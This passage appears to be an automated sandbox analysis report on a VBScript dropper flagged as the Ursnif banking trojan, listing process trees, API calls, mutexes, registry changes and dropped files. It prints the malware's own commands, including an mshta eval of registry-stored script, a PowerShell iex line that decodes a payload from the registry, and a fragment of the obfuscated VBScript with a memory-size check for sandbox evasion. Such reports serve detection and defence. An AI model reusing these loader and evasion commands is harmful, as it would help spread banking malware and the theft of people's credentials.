Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B83830 NtWriteVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8387C NtCreateSection,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7BAB4 NtAllocateVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81AC4 NtQueryInformationProcess,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7CCA0 NtReadVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9ADD4 NtQueryInformationProcess,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8FFCC NtMapViewOfSection,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\System32\control.exe	Code function: 25_2_00BB1002 NtProtectVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1AC4 NtQueryInformationProcess,
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF7501002 NtProtectVirtualMemory,NtProtectVirtualMemory,

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9C164
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9A4BC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9676C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9E080
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B920F8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7203C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B90034
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B96064
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8B040
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B991A0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89138
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7C134
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81174
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9F940
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B98224
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B93208
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89380
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B72BC8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B77320
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B78B5C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B994B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89CB0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8D4A8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7BCF8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B83CE0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B974CC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B80CC0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7D460
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81D94
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8452C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8B520
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9B516
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B76D08
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9BEB0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B926B4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7AE04
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B817B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9AFB8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B737B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B79F98
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8F770
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7B75C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EC164
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EA4BC
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E3208
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E91A0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E8224
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E20F8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1174
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9138
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CC134
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EF940
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D17B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C37B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EAFB8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E6064
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EE080
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C203C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E0034
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DB040
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E26B4
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EBEB0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E676C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DF770
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C9F98
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CB75C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CAE04
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D3CE0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CBCF8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C6D08
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EB516
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DD4A8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E94B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9CB0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E74CC
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D0CC0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1D94
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D452C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DB520
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C2BC8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CD460
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9380
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C7320
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D8B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C8B5C

Source: 2Q4tLHa5wbO1.vbs

Initial sample: Strings found which are bigger than 50

Source: 5b2bnkld.dll.21.dr	Static PE information: No import functions for PE file found
Source: ztp4fhzn.dll.24.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winVBS@31/42@10/2

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B24C39E1-2D7D-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{523EEBAD-89C9-54C5-A3A6-CDC8873A517C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{DE7DF658-A5CB-C008-1FF2-A9F4C346ED68}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{42CF918A-B9C5-C4B3-5396-FD38372A81EC}

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000015.00000002.780870851.000001EEE0E80000.00000002.00000001.sdmp, csc.exe, 00000018.00000002.791405788.0000024AD3D50000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.820880148.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000019.00000002.848753339.0000022984BCC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000019.00000002.848753339.0000022984BCC000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.820880148.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.ScriptName, cStr(293199629)) > 0 And Ian961 = 0) Then' hazelnut eyebright nereid Carthage refugee adrenalin Pillsbury, cesium Verdi jujube impassion Chesapeake Martha newsmen, covariant jitter cosmos, bounce Dickerson Huffman roe decent critter mucus veneer, Algonquin Waterloo Pygmalion cupidity Faust Tyson, metallurgy sabotage beady dodge quadratic recess. laminar Hesse mimicking plan Vanderbilt mutton MacGregor Europa mycoplasma need seven axiomatic Manley plaguey boxy block clearheaded nightmare stingy assail Brandon Shepard theyll cachalot coercible indigestion imperious advisor lioness clockwise whelm valuate cue arbutus accordant wiseacre massage narwhal210. junta. billfold giveaway ROTC sake. antiphonal infinity ashame IBM diamagnetism erosive allegate birch cougar. cinematic Dahl leitmotif Exit FunctionEnd If' intrusive Breton Basque. 2165312 daunt Acapulco Annie Fargo permitted. conundrum mere waterhole eradicable lorry Rafael morass tinkle conservator Judd Steiner lusty Mendelssohn menstruate orthonormal. 3014178 orthodoxy. 5019054 informative irresolvable Philippine Mafioso, Augustus. slaughter381 bulb Berkowitz Leeuwenhoek Christmas stint, Saginaw switchback Set taxidermy = GetObject("winmgmts:\\.\root\cimv2")Set Annie354 = taxidermy.ExecQuery("Select * from Win32_ComputerSystem")For Each selenate In Annie354Vaduz = Vaduz + Int((selenate.TotalPhysicalMemory) / (((104 - (146 - 143.0)) - 94.0) + 1048569.0))NextIf Vaduz < (1446 - ((49 - 3.0) + (4631 - 4261.0))) ThenNtGJYPtIEnd IfREM governor, 3468779 Anglophobia congresswomen duckweed Preston wolfish tremendous motor Glidden Herculean dusk sari ellipsoid bacterial Vladivostok283 ventral Dreyfuss farther755 statuette ding coexist Hungarian, Rudy you symmetry youve cobblestone fascicle tire phlox Klux illustrate dispense ouzo Frey204 criterion barrier conscience curio constipate Bradley beware tariff, 6831937 scorpion. kaleidoscope surefire, 7605153 Oregon Melinda Plexiglas pot concurring End FunctionFunction Perkins637()on error resume nextDim detritus115: Set detritus115 = CreateObject("Scripting.FileSystemObject")Dim rnVGZw: Set rnVGZw = detritus115.OpenTextFile(WScript.ScriptFullName)' aristocrat electrician Fraser dispersive howsomever inhibit58 Berman. 3125459 amplitude604 minutemen Anderson985 Cadillac camelopard calculable. saga travelogue nomogram Vivian creedal. sluggish meritorious giraffe scathing139. concept Duncan Ruben tribal exclusion florist. cathedral diplomat flexible717 sludge neater Bernadine bluster suggestible focus mandrill Nashua anatomic vodka boxy963 Leona screenful Neal campfire bush foot crockery QED. convolute Fenton landlocked marathon Riordan. 9150746 Confucian mull consultant. stickle femur bailiff Kansas Mollie storekeep embeddable. proficient euphe293199629 abalone addressee strict rug Layton bloodstain Moll combustion, 2306119 assemble Prokofieff doberman = rnVGZw.ReadallrnVGZw.close'MsgBox(((1518 - (87 + (742 - 63.0))) - 29.0))REM India

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B74DCD push 3B000001h; retf
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C4DCD push 3B000001h; retf

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\marginal.roq	Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\marginal.roq

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
